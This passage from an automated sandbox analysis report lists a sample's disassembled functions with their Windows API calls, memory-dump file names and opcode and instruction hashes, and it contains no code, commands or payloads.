                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1423138444-0
                                                                                                                                • Opcode ID: bae15768b55c819f09501e6ee30734aa84626c4b04f93caa058dde46ebb48564
                                                                                                                                • Instruction ID: befb82f11a758d1cd2c8213f805afc71039d620862d7591049ec9e716e813214
                                                                                                                                • Opcode Fuzzy Hash: bae15768b55c819f09501e6ee30734aa84626c4b04f93caa058dde46ebb48564
                                                                                                                                • Instruction Fuzzy Hash: 2621E135900018BFCB258F54DC98EEA7BB6FB49720F04806AF909473A2C3309D51FBA1
                                                                                                                                Function 00F5220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F5221E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrlen
                                                                                                                                • String ID: ($|
                                                                                                                                • API String ID: 1659193697-1631851259
                                                                                                                                • Opcode ID: c600b8fc4d6fe178cb515da09f036b55fd3734b34d39ab9dec00a4cef82a7cd6
                                                                                                                                • Instruction ID: 49dd2b32e4c9405a151a864ed56bced9bece1aaf265a751b7c80d672d46ed26d
                                                                                                                                • Opcode Fuzzy Hash: c600b8fc4d6fe178cb515da09f036b55fd3734b34d39ab9dec00a4cef82a7cd6
                                                                                                                                • Instruction Fuzzy Hash: A2323575A007059FCB68CF69C480A6AB7F0FF48320B15C56EE99ADB3A1E770E941DB44
                                                                                                                                Function 00F2AD5C Relevance: 4.9, APIs: 3, Instructions: 378nativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00F2AF8E
                                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00F2AE5E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DialogLongNtdllProc_Window
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2065330234-0
                                                                                                                                • Opcode ID: 4bc9c5fc9d05cc128d436d09beded78274a581552cb46f5cadd9bd07659377d5
                                                                                                                                • Instruction ID: c4e2cb0da78404a54adcca92a2be17fdc20e956deb1e09d68a1f097b45311b49
                                                                                                                                • Opcode Fuzzy Hash: 4bc9c5fc9d05cc128d436d09beded78274a581552cb46f5cadd9bd07659377d5
                                                                                                                                • Instruction Fuzzy Hash: 29A15F62504624BFDB28BB2ABC98EFF3A5DEB45760B11412BF405D6191CA1D8C0AF373
                                                                                                                                Function 00F6550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F64A1E,00000000), ref: 00F655FD
                                                                                                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F65629
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 599397726-0
                                                                                                                                • Opcode ID: 3706c8af44ba41df3b4ec3ce63c7ece556363e97103119685b0058b7b750eaa2
                                                                                                                                • Instruction ID: e745c0c40864020ad60535336dc8411341d6b6cf668ce0ce26bbd226d4fda11d
                                                                                                                                • Opcode Fuzzy Hash: 3706c8af44ba41df3b4ec3ce63c7ece556363e97103119685b0058b7b750eaa2
                                                                                                                                • Instruction Fuzzy Hash: 7141C672900609BFEB109A95CC85FBFB7BDEB40B28F14401AF60676141DA71AE41FA64
                                                                                                                                Function 00F5EA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00F5EA95
                                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F5EAEF
                                                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00F5EB3C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1682464887-0
                                                                                                                                • Opcode ID: 536ebbdba3355fbf8649ba8372efa8bf65160991a8ee278927c15ab081a429c4
                                                                                                                                • Instruction ID: 87ec460177f756267481b1ed382c0465f09aa7ca7f514e79bd565754378539b8
                                                                                                                                • Opcode Fuzzy Hash: 536ebbdba3355fbf8649ba8372efa8bf65160991a8ee278927c15ab081a429c4
                                                                                                                                • Instruction Fuzzy Hash: B3215E35A00218EFCB00DFA5D895AEDBBB4FF48314F14809AE905A7351DB35D945DB50
                                                                                                                                Function 00F16670 Relevance: 4.1, APIs: 2, Instructions: 1093COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4104443479-0
                                                                                                                                • Opcode ID: 56ad863cfff44167aa3e51485f1c2dda08cca5c33af5d2223f125016ca54cc4d
                                                                                                                                • Instruction ID: 4c96f503b34d5314becf326346d487e2405e0fd987a9fda3d6cd38cd2300d7bf
                                                                                                                                • Opcode Fuzzy Hash: 56ad863cfff44167aa3e51485f1c2dda08cca5c33af5d2223f125016ca54cc4d
                                                                                                                                • Instruction Fuzzy Hash: 5AA22875E04219DFDF24CF58C8806EDBBB1BF48324F2581AAE859AB390D7749D81EB50
                                                                                                                                Function 00F2AFB4 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00F2AF8E
                                                                                                                                  • Part of subcall function 00F2B155: GetWindowLongW.USER32(?,000000EB), ref: 00F2B166
                                                                                                                                • GetParent.USER32(?), ref: 00F8F4B5
                                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00F2ADDD,?,?,?,00000006,?), ref: 00F8F52F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LongWindow$DialogNtdllParentProc_
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 314495775-0
                                                                                                                                • Opcode ID: 684c8c79d4555202de3e722aee889cccea17929fca8b8ac1588cbb5cdff8c646
                                                                                                                                • Instruction ID: e76dff8109775a5930b7e240ad8db56bf67056a1dc5ad28f2535ff259210addb
                                                                                                                                • Opcode Fuzzy Hash: 684c8c79d4555202de3e722aee889cccea17929fca8b8ac1588cbb5cdff8c646
                                                                                                                                • Instruction Fuzzy Hash: F8217136A00114BFCB25DF68ED48AEA3BA2EB09370F184265F9258B2E2D7305D51F710
                                                                                                                                Function 00F570AE Relevance: 3.1, APIs: 2, Instructions: 61COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00F57115
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F5711E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseControlDeviceHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2349616827-0
                                                                                                                                • Opcode ID: 01ca5e5fe7cd02d3412d00a1c51d4b49a9e537b9056b9aa645b62580fcde8322
                                                                                                                                • Instruction ID: 7035856c70dd2d1fc9c66a45c5140e6f2c99a8f99f5e7fada89114ee510f79b9
                                                                                                                                • Opcode Fuzzy Hash: 01ca5e5fe7cd02d3412d00a1c51d4b49a9e537b9056b9aa645b62580fcde8322
                                                                                                                                • Instruction Fuzzy Hash: AB11A5B2D00228BEE7109BACDC45FAFB7BCEB08764F104556BA01E7190D2749E0497E1
                                                                                                                                Function 00F7F0A1 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00F2AF8E
                                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00F8F352,?,?,?), ref: 00F7F115
                                                                                                                                  • Part of subcall function 00F2B155: GetWindowLongW.USER32(?,000000EB), ref: 00F2B166
                                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00F7F0FB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1273190321-0
                                                                                                                                • Opcode ID: 7e00c519d584828912cdc0677c67197cb51a87132ccbb744b67ad96fe1b98c09
                                                                                                                                • Instruction ID: 658e28c574260482cb7609626b2352ee61d61bb814573e877ce2ea78964abc48
                                                                                                                                • Opcode Fuzzy Hash: 7e00c519d584828912cdc0677c67197cb51a87132ccbb744b67ad96fe1b98c09
                                                                                                                                • Instruction Fuzzy Hash: 4601B132600218EBDB21DF18EC45F6A3BB6FB85364F548126F8190B2E1C7719816FB52
                                                                                                                                Function 00F7F45A Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • ClientToScreen.USER32(?,?), ref: 00F7F47D
                                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00F8F42E,?,?,?,?,?), ref: 00F7F4A6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClientDialogNtdllProc_Screen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3420055661-0
                                                                                                                                • Opcode ID: fb534aad7d4d3f5b8b4e8bc56e74e42955b4283b31529dcb0b573588a7195393
                                                                                                                                • Instruction ID: 2543f4d58533e41e4945e8642b2097a84deb65679e1e4520107dfce34d0f8214
                                                                                                                                • Opcode Fuzzy Hash: fb534aad7d4d3f5b8b4e8bc56e74e42955b4283b31529dcb0b573588a7195393
                                                                                                                                • Instruction Fuzzy Hash: 29F0177281011CBFEB049F95DC099AE7BB9FF44351F24401AF902A2160D3B5AA51AB60
                                                                                                                                Function 00F5D712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00F6C2E2,?,?,00000000,?), ref: 00F5D73F
                                                                                                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00F6C2E2,?,?,00000000,?), ref: 00F5D751
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorFormatLastMessage
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3479602957-0
                                                                                                                                • Opcode ID: a7b23af78d0c17426aeb6a096c707b9eb32a36fd51952d15af2e9d43136845ae
                                                                                                                                • Instruction ID: a18f87760c600de57429dfd1bb7e9f2bc7da429e30364ceb8e00273cdcdd9e95
                                                                                                                                • Opcode Fuzzy Hash: a7b23af78d0c17426aeb6a096c707b9eb32a36fd51952d15af2e9d43136845ae
                                                                                                                                • Instruction Fuzzy Hash: 39F0A73550132DBBDB21AFA4DC49FEA776CBF49362F008116BA05D6181D734D944EBA1
                                                                                                                                Function 00F54B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00F54B89
                                                                                                                                • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00F54B9C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InputSendkeybd_event
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3536248340-0
                                                                                                                                • Opcode ID: 1990aeeae4bf2b3c02af183c8486d500c835cf9d17c99106c56aeb3e24540881
                                                                                                                                • Instruction ID: b3f9cba3ecafb4c39d40e4ff1c988f36e799774f638e1f588531a02efef5e299
                                                                                                                                • Opcode Fuzzy Hash: 1990aeeae4bf2b3c02af183c8486d500c835cf9d17c99106c56aeb3e24540881
                                                                                                                                • Instruction Fuzzy Hash: A7F06D7180024DAFDB058FA1C805BBE7BB4AF00309F04840AFD51A5191D379D615EFA0
                                                                                                                                Function 00F4B8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F4B9EC), ref: 00F4B8C5
                                                                                                                                • CloseHandle.KERNEL32(?,?,00F4B9EC), ref: 00F4B8D7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 81990902-0
                                                                                                                                • Opcode ID: 7b9f5ca4c1eaaee7d0df25f780e3e0428c1931e94b14791773253ea09319b444
                                                                                                                                • Instruction ID: 59fa3ed6a1e87cc78bdd7ca5a4a15c6aff8ae78893512db6a22e400843afa602
                                                                                                                                • Opcode Fuzzy Hash: 7b9f5ca4c1eaaee7d0df25f780e3e0428c1931e94b14791773253ea09319b444
                                                                                                                                • Instruction Fuzzy Hash: DDE0E672004511AFE7262B55EC05D777BEDEF04321B20841AF45581471DB619CD1FB10
                                                                                                                                Function 00F7F594 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00F7F59C
                                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00F8F3AD,?,?,?,?), ref: 00F7F5C6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DialogLongNtdllProc_Window
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2065330234-0
